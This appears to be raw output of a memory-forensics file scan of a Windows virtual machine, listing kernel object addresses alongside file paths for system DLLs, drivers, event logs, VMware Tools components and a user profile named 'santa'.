+0x918b754b2180 \Windows\System32\Windows.Graphics.dll 216 +0x918b754b2310 \Dev\Query 216 +0x918b754b24a0 \CMNotify 216 +0x918b754b27c0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b754b2c70 \Endpoint 216 +0x918b754b2e00 \$Directory 216 +0x918b754b3120 \CMNotify 216 +0x918b754b32b0 \Dev\Query 216 +0x918b754b3440 \Windows\System32\svchost.exe 216 +0x918b754b35d0 \SwDevice 216 +0x918b754b38f0 \Windows\System32\FWPUCLNT.DLL 216 +0x918b754b3a80 \Windows\System32 216 +0x918b754b3da0 \Endpoint 216 +0x918b754b4250 \CMNotify 216 +0x918b754b43e0 \Windows\System32\en-US\d2d1.dll.mui 216 +0x918b754b4570 \CMNotify 216 +0x918b754b4700 \Windows\System32\winevt\Logs\Internet Explorer.evtx 216 +0x918b754b4890 \Windows\System32\shsvcs.dll 216 +0x918b754b4a20 \Windows\System32\winevt\Logs\HardwareEvents.evtx 216 +0x918b754b4bb0 \Windows\System32\AudioSes.dll 216 +0x918b754b4ed0 \atsvc 216 +0x918b754b5510 \Windows\System32\wlanapi.dll 216 +0x918b754b5830 \CMNotify 216 +0x918b754b59c0 \atsvc 216 +0x918b754b5b50 \Windows\Tasks 216 +0x918b754b5ce0 \atsvc 216 +0x918b754b5e70 \Windows\Registration\R000000000006.clb 216 +0x918b754b6190 \Windows\System32\winevt\Logs\Key Management Service.evtx 216 +0x918b754b6320 \Windows\System32\usermgr.dll 216 +0x918b754b64b0 \Windows\System32\en-US\netprofmsvc.dll.mui 216 +0x918b754b6640 \Windows\System32\winevt\Logs\Windows PowerShell.evtx 216 +0x918b754b67d0 \Windows\System32\netprofmsvc.dll 216 +0x918b754b6c80 \Windows\System32\MrmCoreR.dll 216 +0x918b754b7130 \CMApi 216 +0x918b754b72c0 \Windows\System32\Windows.UI.dll 216 +0x918b754b7450 \Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx 216 +0x918b754b75e0 \Windows\System32\BCP47Langs.dll 216 +0x918b754b7770 \Windows\System32\cabinet.dll 216 +0x918b754b7900 \Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx 216 +0x918b754b7a90 \Windows\System32 216 +0x918b754b7db0 \Windows\System32\mstask.dll 216 +0x918b754b80d0 \Windows\System32\svchost.exe 216 +0x918b754b8260 \Windows\System32\InputHost.dll 216 +0x918b754b83f0 \Windows\System32\wcmsvc.dll 216 +0x918b754b8580 \CMApi 216 +0x918b754b8710 \Windows\System32\mobilenetworking.dll 216 +0x918b754b8ee0 \Windows\System32\radardt.dll 216 +0x918b754b9200 \Windows\System32\svchost.exe 216 +0x918b754b96b0 \Windows\System32\spoolsv.exe 216 +0x918b754b9840 \Windows\System32\OnDemandConnRouteHelper.dll 216 +0x918b754b99d0 \Windows\System32\coreaudiopolicymanagerext.dll 216 +0x918b754b9b60 \Windows\System32\FamilySafetyExt.dll 216 +0x918b754b9cf0 \Windows\System32\samcli.dll 216 +0x918b754b9e80 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b754ba1a0 \Windows\System32 216 +0x918b754ba330 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b754ba4c0 \Windows\System32\dusmsvc.dll 216 +0x918b754ba650 \CMNotify 216 +0x918b754ba7e0 \Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx 216 +0x918b754bab00 \CMNotify 216 +0x918b754bac90 \Windows\Registration\R000000000006.clb 216 +0x918b754bae20 \Windows\System32\en-US\gpsvc.dll.mui 216 +0x918b75561670 \Windows\System32\drivers\lltdio.sys 216 +0x918b75561ac0 \$PrepareToShrinkFileSize 216 +0x918b75562080 \$PrepareToShrinkFileSize 216 +0x918b755634a0 \Windows\System32\drivers\mslldp.sys 216 +0x918b755638f0 \SystemRoot\System32\Config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR 216 +0x918b75564470 \Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.blf 216 +0x918b75565a00 \Windows\System32\drivers\rspndr.sys 216 +0x918b75565e50 \Windows\System32\drivers\http.sys 216 +0x918b75567100 \Windows\System32\drivers\winquic.sys 216 +0x918b755673e0 \Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.0.regtrans-ms 216 +0x918b75567550 \Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.2.regtrans-ms 216 +0x918b75568240 \Windows\System32\config\TxR\{fd9a35aa-49fe-11e9-aa2c-248a07783950}.TxR.1.regtrans-ms 216 +0x918b7556c460 \Windows\System32\drivers\mrxsmb.sys 216 +0x918b7556d5a0 \Windows\System32\drivers\bowser.sys 216 +0x918b75616100 \Windows\System32\winevt\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx 216 +0x918b75616290 \Windows\System32\CSystemEventsBrokerClient.dll 216 +0x918b756165b0 \Windows\System32 216 +0x918b75616740 \Windows\System32 216 +0x918b756168d0 \Windows\Fonts\segoeuib.ttf 216 +0x918b75616a60 \Dev\Query 216 +0x918b75616bf0 \CMNotify 216 +0x918b756170a0 \Windows\System32 216 +0x918b75617230 \Windows\System32\fveapi.dll 216 +0x918b756173c0 \Windows\System32\TimeBrokerClient.dll 216 +0x918b756176e0 \Windows\System32\en-US\spoolsv.exe.mui 216 +0x918b75617870 \CMApi 216 +0x918b75617a00 \CMNotify 216 +0x918b75617b90 \Windows\System32\svchost.exe 216 +0x918b75617d20 \Windows\System32\urlmon.dll 216 +0x918b75617eb0 \spoolss 216 +0x918b756181d0 \Windows\System32\BFE.DLL 216 +0x918b75618360 \CMNotify 216 +0x918b756184f0 \Windows\System32\svchost.exe 216 +0x918b75618680 \CMNotify 216 +0x918b75618810 \Windows\System32\winevt\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx 216 +0x918b756189a0 \Windows\System32\Windows.StateRepository.dll 216 +0x918b75618b30 \CMNotify 216 +0x918b75618cc0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b75619170 \Windows\System32\PCPKsp.dll 216 +0x918b75619300 \spoolss 216 +0x918b75619490 \Windows\Registration\R000000000006.clb 216 +0x918b75619940 \Windows\SoftwareDistribution\DataStore\Logs\edb.loglog 216 +0x918b75619ad0 \Windows\System32\StateRepository.Core.dll 216 +0x918b75619c60 \Windows\System32\en-US\bfe.dll.mui 216 +0x918b7561a110 \Endpoint 216 +0x918b7561a2a0 \Windows\System32\TimeBrokerServer.dll 216 +0x918b7561a5c0 \$Directory 216 +0x918b7561aa70 \$Directory 216 +0x918b7561ac00 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b7561ad90 \Endpoint 216 +0x918b7561b3d0 \spoolss 216 +0x918b7561b560 \Windows\System32\AppXDeploymentClient.dll 216 +0x918b7561b6f0 \Windows\System32 216 +0x918b7561b880 \Windows\System32\capauthz.dll 216 +0x918b7561ba10 \Windows\System32\LanguageOverlayUtil.dll 216 +0x918b7561bba0 \Endpoint 216 +0x918b7561bd30 \Winsock2\CatalogChangeListener-5e8-0 216 +0x918b7561bec0 \Endpoint 216 +0x918b7561c1e0 \Windows\System32\BCP47mrm.dll 216 +0x918b7561c370 \CMNotify 216 +0x918b7561c500 \Windows\System32\wkssvc.dll 216 +0x918b7561c690 \wkssvc 216 +0x918b7561c820 \Windows\System32\dsparse.dll 216 +0x918b7561c9b0 \wkssvc 216 +0x918b7561cb40 \Windows\System32\rasadhlp.dll 216 +0x918b7561ce60 \CMApi 216 +0x918b7561d310 \Windows\System32\en-US\Windows.UI.Immersive.dll.mui 216 +0x918b7561d4a0 \Windows\System32\cmintegrator.dll 216 +0x918b7561d630 \Windows\System32\webio.dll 216 +0x918b7561d7c0 \Windows\System32\Windows.UI.Xaml.dll 216 +0x918b7561d950 \Windows\System32\wcmcsp.dll 216 +0x918b7561dae0 \Windows\System32\UserMgrProxy.dll 216 +0x918b7561e2b0 \Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx 216 +0x918b7561e5d0 \Windows\System32\MPSSVC.dll 216 +0x918b7561e760 \Windows\System32\FirewallAPI.dll 216 +0x918b7561e8f0 \Windows\System32\en-US\FirewallAPI.dll.mui 216 +0x918b7561ea80 \Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Restricted.evtx 216 +0x918b7561ec10 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b7561f0c0 \Windows\Registration\R000000000006.clb 216 +0x918b7561f3e0 \Windows\System32\cryptsvc.dll 216 +0x918b7561f700 \Windows\System32\trkwks.dll 216 +0x918b7561f890 \Windows\System32\WSHTCPIP.DLL 216 +0x918b7561fa20 \Windows\System32\crypttpmeksvc.dll 216 +0x918b7561fbb0 \trkwks 216 +0x918b7561fd40 \Program Files\VMware\VMware Tools\glib-2.0.dll 216 +0x918b7561fed0 \Program Files\VMware\VMware Tools\gmodule-2.0.dll 216 +0x918b756201f0 \Windows\System32\cryptcatsvc.dll 216 +0x918b75620380 \Windows\System32 216 +0x918b75620510 \Windows\System32\wship6.dll 216 +0x918b756206a0 \Windows\System32\dmenrollengine.dll 216 +0x918b75620830 \Program Files\VMware\VMware Tools\VMware VGAuth\intl.dll 216 +0x918b756209c0 \Program Files\VMware\VMware Tools\gobject-2.0.dll 216 +0x918b75620ce0 \Windows\System32\version.dll 216 +0x918b75620e70 \trkwks 216 +0x918b75621190 \Windows\System32\wdi.dll 216 +0x918b75621320 \$Directory 216 +0x918b756214b0 \Program Files\VMware\VMware Tools\intl.dll 216 +0x918b75621640 \$Directory 216 +0x918b756217d0 \Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe 216 +0x918b75621960 \Windows\System32\iphlpsvc.dll 216 +0x918b75621af0 \Windows\System32\diagtrack.dll 216 +0x918b75621c80 \Windows\Registration\R000000000006.clb 216 +0x918b75622130 \Windows\System32\dps.dll 216 +0x918b756222c0 \Windows\System32\perftrack.dll 216 +0x918b75622450 \trkwks 216 +0x918b756225e0 \Windows\System32\webauthn.dll 216 +0x918b75622770 \Program Files\VMware\VMware Tools\vmtoolsd.exe 216 +0x918b75622900 \Windows\System32\netapi32.dll 216 +0x918b75622a90 \Windows\System32\winsqlite3.dll 216 +0x918b75622c20 \Windows\System32\windowsperformancerecordercontrol.dll 216 +0x918b75622db0 \Windows\System32\NetSetupApi.dll 216 +0x918b756230d0 \Windows\System32\fwpolicyiomgr.dll 216 +0x918b756233f0 \Windows\System32\diagperf.dll 216 +0x918b75623580 \Windows\System32\CatRoot 216 +0x918b75623710 \Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx 216 +0x918b756238a0 \Program Files\VMware\VMware Tools\VMware VGAuth\glib-2.0.dll 216 +0x918b75623a30 \Windows\System32\pnpts.dll 216 +0x918b75623bc0 \Program Files\VMware\VMware Tools\pcre.dll 216 +0x918b75623d50 \Program Files\VMware\VMware Tools\VMware VGAuth\libeay32.dll 216 +0x918b75623ee0 \Program Files\VMware\VMware Tools\VMware VGAuth\ssleay32.dll 216 +0x918b75624200 \CMApi 216 +0x918b75624520 \Windows\System32\winnlsres.dll 216 +0x918b756246b0 \Windows\System32 216 +0x918b75624840 \Windows\System32\tbs.dll 216 +0x918b756249d0 \Program Files\VMware\VMware Tools\VMware VGAuth\libxml2.dll 216 +0x918b75624e80 \Program Files\VMware\VMware Tools\vmtools.dll 216 +0x918b756251a0 \Windows\System32\ProximityService.dll 216 +0x918b75625330 \Windows\System32\vcruntime140.dll 216 +0x918b756254c0 \Windows\System32\ProximityCommon.dll 216 +0x918b75625650 \Windows\System32\vsstrace.dll 216 +0x918b75625970 \Windows\System32\vssapi.dll 216 +0x918b75625b00 \Dev\Query 216 +0x918b75625c90 \Windows\System32\weretw.dll 216 +0x918b75625e20 \Dev\Query 216 +0x918b75664af0 \Windows\System32\drivers\vmmemctl.sys 216 +0x918b75666640 \Windows\System32\drivers\mrxsmb20.sys 216 +0x918b75667610 \Windows\System32\drivers\srvnet.sys 216 +0x918b75667eb0 \$PrepareToShrinkFileSize 216 +0x918b756685e0 \Windows\System32\drivers\mmcss.sys 216 +0x918b75669890 \Windows\System32\drivers\mrxsmb10.sys 216 +0x918b7566a580 \Windows\System32\drivers\PEAuth.sys 216 +0x918b7566b100 \Windows\System32\drivers\Ndu.sys 216 +0x918b7566e350 \Windows\System32\drivers\tcpipreg.sys 216 +0x918b756729c0 \Windows\System32\drivers\srv2.sys 216 +0x918b756c1100 \Dev\Query 216 +0x918b756c1740 \Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx 216 +0x918b756c1a60 \Windows\System32\npmproxy.dll 216 +0x918b756c1bf0 \Dev\Query 216 +0x918b756c1d80 \$Directory 216 +0x918b756c2230 \Dev\Query 216 +0x918b756c2550 \$Directory 216 +0x918b756c26e0 \Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx 216 +0x918b756c2870 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Widgets.dll 216 +0x918b756c2a00 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MsMpEng.exe 216 +0x918b756c2b90 \Windows\System32 216 +0x918b756c2eb0 \Windows\System32\en-US\vsstrace.dll.mui 216 +0x918b756c3360 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b756c34f0 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpSvc.dll 216 +0x918b756c3680 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b756c3810 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpClient.dll 216 +0x918b756c39a0 \$Directory 216 +0x918b756c3cc0 \ProgramData\Microsoft\Windows\wfp\wfpdiag.etl 216 +0x918b756c3e50 \$Directory 216 +0x918b756c4170 \Dev\Query 216 +0x918b756c4300 \Windows\System32\srumsvc.dll 216 +0x918b756c4490 \$Extend\$ObjId:$O:$INDEX_ALLOCATION 216 +0x918b756c4620 \Windows\System32\en-US\advapi32.dll.mui 216 +0x918b756c4940 \Windows\System32\adhapi.dll 216 +0x918b756c4970 䧈畬醋￿䧈畬醋￿ 0 +0x918b756c4ad0 \$Extend\$ObjId 216 +0x918b756c4df0 \Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx 216 +0x918b756c5110 \Windows\System32\iertutil.dll 216 +0x918b756c52a0 \CMNotify 216 +0x918b756c5430 \System Volume Information\tracking.log 216 +0x918b756c5750 \Windows\System32\wfapigp.dll 216 +0x918b756c58e0 \Windows\System32\secur32.dll 216 +0x918b756c5c00 \Program Files\VMware\VMware Tools\VMware VGAuth\libxmlsec.dll 216 +0x918b756c6240 \Program Files\VMware\VMware Tools\VMware VGAuth\libxmlsec-openssl.dll 216 +0x918b756c63d0 \Windows\System32\ProximityCommonPal.dll 216 +0x918b756c66f0 \Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx 216 +0x918b756c6880 \CMApi 216 +0x918b756c6a10 \Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx 216 +0x918b756c6ba0 \Dev\Query 216 +0x918b756c6ec0 \Windows\System32\wbem\WMIsvc.dll 216 +0x918b756c71e0 \$Directory 216 +0x918b756c7370 \Windows\System32\ProximityServicePal.dll 216 +0x918b756c7500 \Windows\System32\stdole2.tlb 216 +0x918b756c7690 \Windows\System32\srvsvc.dll 216 +0x918b756c7820 \Windows\System32\wbem\MOF 216 +0x918b756c7b40 \CMApi 216 +0x918b756c7cd0 \Windows\System32\wbemcomn.dll 216 +0x918b756c8180 \Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx 216 +0x918b756c8310 \Windows\System32\wsock32.dll 216 +0x918b756c8950 \Program Files\VMware\VMware Tools\VMware VGAuth\pcre.dll 216 +0x918b756c8ae0 \Windows\System32\netmsg.dll 216 +0x918b756c8c70 \Windows\System32\en-US\netmsg.dll.mui 216 +0x918b756c8e00 \Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx 216 +0x918b756c9120 \CMApi 216 +0x918b756c9440 \Windows\System32\WPTaskScheduler.dll 216 +0x918b756c95d0 \Windows\System32\es.dll 216 +0x918b756c9760 \Windows\System32\pcasvc.dll 216 +0x918b756c98f0 \Windows\System32\wpnservice.dll 216 +0x918b756c9a80 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b756c9c10 \Windows\System32\wpncore.dll 216 +0x918b756ca0c0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b756ca250 \Windows\System32\esent.dll 216 +0x918b756ca3e0 \Windows\System32\MTFServer.dll 216 +0x918b756ca570 \Windows\System32\Windows.Devices.Enumeration.dll 216 +0x918b756ca700 \Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx 216 +0x918b756ca890 \$Directory 216 +0x918b756caa20 \gecko.4576.3988.14258203149884878546 216 +0x918b756cabb0 \Windows\SysWOW64\WSHTCPIP.DLL 216 +0x918b756caed0 \Program Files\VMware\VMware Tools\icudt44l.dat 216 +0x918b756cb510 \Windows\System32\cdp.dll 216 +0x918b756cb6a0 \Windows\System32\vsocklib.dll 216 +0x918b756cb9c0 \pagefile.sys 216 +0x918b756cbb50 \$Directory 216 +0x918b756cc190 \$Directory 216 +0x918b756cc960 \Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx 216 +0x918b756ccaf0 \Program Files (x86)\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpi 216 +0x918b756ccc80 \Windows\Temp\vmware-vmsvc-SYSTEM.log 216 +0x918b756cd2c0 \Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx 216 +0x918b756cd5e0 \CMNotify 216 +0x918b756cd900 \Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx 216 +0x918b756cdc20 \Program Files\VMware\VMware Tools\plugins\common\hgfsServer.dll 216 +0x918b756ce0d0 \Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx 216 +0x918b756ce710 \Program Files\VMware\VMware Tools\hgfs.dll 216 +0x918b756ce8a0 \CMApi 216 +0x918b756ceee0 \Windows\System32\vfuprov.dll 216 +0x918b756cf200 \Windows\System32\eeprov.dll 216 +0x918b756cf390 \Windows\System32\nduprov.dll 216 +0x918b756cf6b0 \$Directory 216 +0x918b756cfb60 \Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx 216 +0x918b756d01a0 \Windows\System32\mpr.dll 216 +0x918b756d0330 \Windows\System32\dbgcore.dll 216 +0x918b756d07e0 \Windows\System32\en-US\mscms.dll.mui 216 +0x918b756d0b00 \Windows\System32\wpnsruprov.dll 216 +0x918b756d0c90 \Windows\System32\ncuprov.dll 216 +0x918b75726360 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTWFP-IPsec Diagnostics.etl 216 +0x918b75786490 \ 216 +0x918b75932290 \Windows\System32\srumapi.dll 216 +0x918b759325b0 \Windows\System32\httpprxm.dll 216 +0x918b75932740 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b759328d0 \$Directory 216 +0x918b75932a60 \Windows\System32\adhsvc.dll 216 +0x918b75932d80 \Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx 216 +0x918b759330a0 \Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx 216 +0x918b75933230 \Windows\System32\energyprov.dll 216 +0x918b759333c0 \Endpoint 216 +0x918b75933550 \Windows\System32\SleepStudy\ScreenOn\ScreenOnPowerStudyTraceSession-2023-11-17-15-49-38.etl 216 +0x918b759336e0 \Endpoint 216 +0x918b75933870 \Endpoint 216 +0x918b75933a00 \Windows\System32\taskhostw.exe 216 +0x918b75933b90 \$Directory 216 +0x918b75933d20 \Endpoint 216 +0x918b759341d0 \Winsock2\CatalogChangeListener-3d0-0 216 +0x918b759344f0 \Windows\System32\sscore.dll 216 +0x918b75934680 \Windows\System32\en-US\wldap32.dll.mui 216 +0x918b759349a0 \Endpoint 216 +0x918b75934b30 \Program Files\VMware\VMware Tools\plugins\common\hgfsUsability.dll 216 +0x918b75934e50 \Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx 216 +0x918b75935170 \Program Files\VMware\VMware Tools\plugins\common\vix.dll 216 +0x918b75935300 \Windows\System32\en-US\iphlpsvc.dll.mui 216 +0x918b75935490 \Windows\System32\sscoreext.dll 216 +0x918b75935940 \CMApi 216 +0x918b75935ad0 \swapfile.sys 216 +0x918b75935c60 \Windows\System32\usoapi.dll 216 +0x918b75935df0 \Program Files\VMware\VMware Tools\plugins\vmsvc\appInfo.dll 216 +0x918b75936110 \Windows\System32\Windows.Shell.ServiceHostBuilder.dll 216 +0x918b75936430 \Windows\System32\wmidcom.dll 216 +0x918b759365c0 \$ConvertToNonresident 216 +0x918b759368e0 \Windows\System32\resutils.dll 216 +0x918b75937240 \Windows\System32\Windows.System.Launcher.dll 216 +0x918b75937560 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\resources.pri 216 +0x918b759376f0 \Windows\System32\mi.dll 216 +0x918b75937880 \Windows\System32\en-US\taskhostw.exe.mui 216 +0x918b75937a10 \Windows\Fonts\segoeuil.ttf 216 +0x918b75937ba0 \Windows\System32\miutils.dll 216 +0x918b75937d30 \$Directory 216 +0x918b75937ec0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f\comctl32.dll 216 +0x918b75938370 \Windows\System32\msvcp140.dll 216 +0x918b75938500 \Windows\System32\clusapi.dll 216 +0x918b75938690 \Program Files\VMware\VMware Tools\libeay32.dll 216 +0x918b75938820 \ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db 216 +0x918b759389b0 \ProgramData\Microsoft\Windows\Caches\cversions.2.db 216 +0x918b75938b40 \ProgramData\VMware\VMware VGAuth\logfile.txt.0 216 +0x918b75938cd0 \Program Files\VMware\VMware Tools\ssleay32.dll 216 +0x918b75938e60 \Windows\System32\winevt\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx 216 +0x918b75939310 \$Directory 216 +0x918b759394a0 \Windows\System32\cmd.exe 216 +0x918b75939630 \ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db 216 +0x918b759397c0 \Windows\System32\winevt\Logs\Microsoft-Windows-SMBClient%4Operational.evtx 216 +0x918b75939950 \Program Files\VMware\VMware Tools\plugins\vmsvc\deployPkgPlugin.dll 216 +0x918b75939ae0 \Windows\System32\winevt\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx 216 +0x918b7593a120 \Program Files\VMware\VMware Tools\deployPkg.dll 216 +0x918b7593a2b0 \$Directory 216 +0x918b7593a440 \Windows\System32\wbem\wbemcore.dll 216 +0x918b7593aa80 \Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx 216 +0x918b7593ac10 \CMNotify 216 +0x918b7593ada0 \ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db 216 +0x918b7593b250 \$Directory 216 +0x918b7593b570 \$Directory 216 +0x918b7593b700 \Windows\System32\en-US\user32.dll.mui 216 +0x918b7593b890 \Windows\SysWOW64\en-US\user32.dll.mui 216 +0x918b7593bbb0 \CMNotify 216 +0x918b7593bd40 \Windows\System32\wbem\wbemprox.dll 216 +0x918b7593bed0 \Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx 216 +0x918b7593c510 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b7593c9c0 \CMNotify 216 +0x918b7593cce0 \CMNotify 216 +0x918b7593ce70 \Windows 216 +0x918b7593d320 \Winsock2\CatalogChangeListener-258-0 216 +0x918b7593d4b0 \Windows\Prefetch\SVCHOST.EXE-7B92DD11.pf 216 +0x918b7593d640 \CMNotify 216 +0x918b7593d7d0 \CMNotify 216 +0x918b7593daf0 \Endpoint 216 +0x918b7593de10 \Windows\System32\provsvc.dll 216 +0x918b7593e2c0 \Endpoint 216 +0x918b7593e5e0 \srvsvc 216 +0x918b7593e770 \Windows\System32\en-US\vsstrace.dll.mui 216 +0x918b7593e900 \Windows\System32\wbem\esscli.dll 216 +0x918b7593ec20 \Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx 216 +0x918b7593edb0 \Windows\System32\en-US\user32.dll.mui 216 +0x918b7593f260 \Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Audit.evtx 216 +0x918b7593f3f0 \Windows\System32\wbem\wbemsvc.dll 216 +0x918b7593f580 \Output 216 +0x918b7593f710 \$Directory 216 +0x918b7593f8a0 \Windows\System32\winevt\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx 216 +0x918b7593fa30 \Windows\System32\wbem\repdrvfs.dll 216 +0x918b7593fbc0 \Input 216 +0x918b7593fee0 \Windows\System32\dosvc.dll 216 +0x918b75940200 \Windows\Registration\R000000000006.clb 216 +0x918b75940390 \Windows\System32\en-US\dosvc.dll.mui 216 +0x918b75940520 \Windows\Registration\R000000000006.clb 216 +0x918b759406b0 \Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Security.evtx 216 +0x918b75940840 \Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx 216 +0x918b75940a00 ੘疔醋￿੘疔醋￿ 0 +0x918b75940b60 \Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx 216 +0x918b75940e80 \Program Files\VMware\VMware Tools\plugins\vmsvc\diskWiper.dll 216 +0x918b759411a0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT 216 +0x918b75941330 \Windows\System32\wbem\fastprox.dll 216 +0x918b759414c0 \Windows\System32\wbem\wmiutils.dll 216 +0x918b75941b00 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b75941e20 \Program Files\VMware\VMware Tools\plugins\vmsvc\guestInfo.dll 216 +0x918b75a9c100 \Program Files\VMware\VMware Tools\plugins\vmsvc\guestStore.dll 216 +0x918b75a9c290 \CMApi 216 +0x918b75a9c420 \CMNotify 216 +0x918b75a9c740 \Windows\System32\en-US\dnsapi.dll.mui 216 +0x918b75a9c8d0 \Endpoint 216 +0x918b75a9ca60 \Windows\System32\Windows.Security.Authentication.OnlineId.dll 216 +0x918b75a9cbf0 \$Directory 216 +0x918b75a9cd80 \Windows\Registration\R000000000006.clb 216 +0x918b75a9d0a0 \Windows\Registration\R000000000006.clb 216 +0x918b75a9d230 \Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx 216 +0x918b75a9d3c0 \vgauth-service 216 +0x918b75a9d550 \$Directory 216 +0x918b75a9d6e0 \Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx 216 +0x918b75a9d870 \Windows\System32\wbem\Repository\MAPPING1.MAP 216 +0x918b75a9da00 \Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Audit.evtx 216 +0x918b75a9db90 \Program Files\VMware\VMware Tools\plugins\vmsvc\hwUpgradeHelper.dll 216 +0x918b75a9dd20 \Windows\System32\wbem\Repository\MAPPING3.MAP 216 +0x918b75a9deb0 \Windows\System32\svchost.exe 216 +0x918b75a9e1d0 \Windows\System32\wbem\Repository\INDEX.BTR 216 +0x918b75a9e360 \Program Files\VMware\VMware Tools\plugins\vmsvc\powerOps.dll 216 +0x918b75a9e4f0 \Windows\System32\wbem\Repository\MAPPING2.MAP 216 +0x918b75a9e680 \Windows\System32\wbem\Repository\OBJECTS.DATA 216 +0x918b75a9e810 \Windows\System32\Windows.UI.Immersive.dll 216 +0x918b75a9e9a0 \Windows\System32\SearchFilterHost.exe 216 +0x918b75a9eb30 \Program Files\VMware\VMware Tools\plugins\vmsvc\resolutionSet.dll 216 +0x918b75a9ecc0 \Program Files\VMware\VMware Tools\plugins\vmsvc\timeSync.dll 216 +0x918b75a9ee50 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\ls\data.sqlite 216 +0x918b75a9f170 \Program Files\VMware\VMware Tools\plugins\vmsvc\vmbackup.dll 216 +0x918b75a9f490 \Windows\Registration\R000000000006.clb 216 +0x918b75a9f620 \ProgramData\Microsoft\Windows Defender\Support\MPLog-20231116-212734.log 216 +0x918b75a9f7b0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-1714399563-1326177402-2048222277-143663168-2151391019-765408921-4098702777 216 +0x918b75a9f940 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db 216 +0x918b75a9fad0 \Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx 216 +0x918b75a9fc60 \Windows\Prefetch\SVCHOST.EXE-922543B0.pf 216 +0x918b75a9fdf0 \$Directory 216 +0x918b75aa0110 \Windows\System32\MpSigStub.exe 216 +0x918b75aa02a0 \Users\santa\Desktop\desktop.ini 216 +0x918b75aa0430 \Windows\System32\comsvcs.dll 216 +0x918b75aa05c0 \Windows\SysWOW64\linkinfo.dll 216 +0x918b75aa0750 \$Directory 216 +0x918b75aa08e0 \ProgramData\Microsoft\Diagnosis\EventStore.db 216 